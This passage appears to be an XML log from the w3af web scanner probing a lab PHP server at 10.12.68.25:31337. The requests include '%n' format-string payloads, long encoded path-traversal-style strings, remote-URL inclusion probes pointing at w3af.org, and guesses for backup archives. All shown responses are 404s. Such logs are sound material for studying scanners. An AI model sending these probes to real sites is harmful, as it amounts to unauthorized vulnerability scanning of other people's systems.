                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="327">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="328">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="329">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="330">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="331">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="331">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="332">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="333">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="336">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="337">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="338">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="339">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/OIkaALHH HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="340">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about OIkaALHH has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='OIkaALHH'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="341">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="341">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="342">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="342">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="344">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="345">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="346">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="347">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="347">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="349">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/cake" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="349">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
